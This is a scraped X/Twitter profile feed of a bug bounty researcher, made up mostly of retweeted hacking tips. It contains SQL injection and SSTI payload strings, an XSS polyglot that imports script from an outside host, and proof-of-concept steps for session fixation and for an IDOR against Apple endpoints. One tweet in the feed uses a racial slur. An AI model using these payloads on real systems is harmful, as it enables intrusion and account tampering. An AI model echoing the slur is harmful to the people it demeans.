Santiko Kusnul Hakim

701 posts

Santiko Kusnul Hakim

Santiko Kusnul Hakim

@getnow1986

@HackenProof Security Researcher 🇮🇩 ind(o)p3nd3nt cybrscrty 🇮🇩 dapodik ops

Malang, Jawa Timur Katılım Ekim 2022
423 Takip Edilen86 Takipçiler
Santiko Kusnul Hakim retweetledi
Brute Logic
Brute Logic@BRuteLogic·
#SQL Injection Polyglots (Tested on MySQL & MariaDB) &1/*'/*"/**/||1#\ and-1/*'/*"/**/||1--+\ It performs injection on single and double quotes scenarios plus quoteless ones (where the injection lands in 2 consecutive points of the query). Use it in ALL input fields at once.
English
1
40
214
11.3K
Santiko Kusnul Hakim retweetledi
VIEH Group
VIEH Group@viehgroup·
Session Fixation → Account Takeover POC → 1. Attacker generated a valid session ID before login 2. Sent the session link to the victim 3. Victim logged in using the same session 4. Server did not regenerate the session after authentication
English
1
3
47
2.2K
Santiko Kusnul Hakim retweetledi
KNOXSS
KNOXSS@KN0X55·
Use this #XSS payload and pop alert boxes EVERYWHERE! 😎👇 JavaScript://%250A/*?'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(import(/https:X55.is/.source))}//\76-->
English
6
60
400
30.9K
Santiko Kusnul Hakim retweetledi
NaZaniin
NaZaniin@n0aziXss·
⚠️SSTI (Server Side Template Injection) Payload List → If evaluated as 49 - the target is vulnerable: 1. {7*7} 2. {7*7} 3. {{7*7}} 4. [[7*7]] 5. ${7*7} 6. @(7*7) 7. <?=7*7?> 8. <%= 7*7 %> 9. ${= 7*7} 10. {{= 7*7}} 11. ${{7*7}} 12. #{7*7} 13. [=7*7]
English
3
45
299
9K
Behi
Behi@Behi_Sec·
Which platform is the best currently? H1, Bugcrowd or Intigriti?
English
21
0
64
10.7K
Santiko Kusnul Hakim retweetledi
kaden.eth
kaden.eth@0xKaden·
here's an index of 460 common solidity vulnerabilities across 31 unique protocol types scraped from over 10000 solodit findings optimized for LLMs github.com/kadenzipfel/pr…
English
16
39
364
22.2K
Santiko Kusnul Hakim retweetledi
VIEH Group
VIEH Group@viehgroup·
IDOR in APPLE 🍎 POC -> 1. Created two separate user accounts Account A (attacker), Account B (victim) on consultants.apple[.]com/publicLocator/deleteApplication consultants.apple[.]com/publicLocator/submitJoinForm 2. Logged in as Account B, submited the application form and captured the application ID of Account B 3. Now Log in as Account A and intercepted a request to the affected endpoint 4. Replaced Account A’s application ID with Account B’s application ID. 5. Forwarded the modified request 6. Server accepted the request without authorization validation 7. Logged back into Account B 8. Account B’s data is modified or deleted without consent Impact -> Any authenticated user can modify or delete other users’ data Credited to the respected owner #bugbounty #bughunting #bounty #hacking #ethicalhacking #infosec #cybersecurity #bugbountytips #bugbounty #bugbountytip #bughunting #infosecurity #OWASP #ApplicationSecurity #Bugcrowd #Hackerone #day_20
VIEH Group tweet media
English
1
16
146
8.1K
Santiko Kusnul Hakim retweetledi
Hugging Models
Hugging Models@HuggingModels·
Meet VulnLLM-R-7B: a specialized AI that reads code like a security expert. It's trained to spot vulnerabilities before they become breaches. This isn't just another chatbot, it's a digital security guard for your codebase. The community is buzzing because it makes security accessible.
Hugging Models tweet media
English
24
269
1.7K
119K
Dez Bryant
Dez Bryant@DezBryant·
The word don’t bother me.. I don’t say nigga to be rude to folks..let’s change the topic real quick.... do you have any goals in life?
NoMadDubois@TriggaTwitta

@DezBryant Why dont we use any other social derogatory phrase in common banter ??

English
25
4
91
33.3K
Santiko Kusnul Hakim retweetledi
X
X@TheMsterDoctor1·
🚀 **Hack Like a Pro:** Extract IPs from Shodan HTML in Seconds! 🔥 Sick of digging through HTML? Let `grep` do the work! 💻 ```bash grep -oP '(?<=).*?(?=)' ip.html > ips ``` 1️⃣ **Save Shodan page source as HTML** 2️⃣ **Run this command** 3️⃣ **BOOM 💥** — All IPs extracted to `ips`! Master your toolkit! #KaliLinux #HackingTips #CyberSecurity #Shodan #OSINT
English
0
58
289
17.4K
dawgyg - WoH
dawgyg - WoH@thedawgyg·
@host_down @DezBryant i used afl to fuzz a part of chromium, found them with the fuzzer. after i validated them and figured out root cause i then used a couple of agents to help me craft a poc that could trigger them from html.
English
3
0
9
577
HackenProof
HackenProof@HackenProof·
What’s the most rewarding bug you’ve caught?
English
9
2
34
2.7K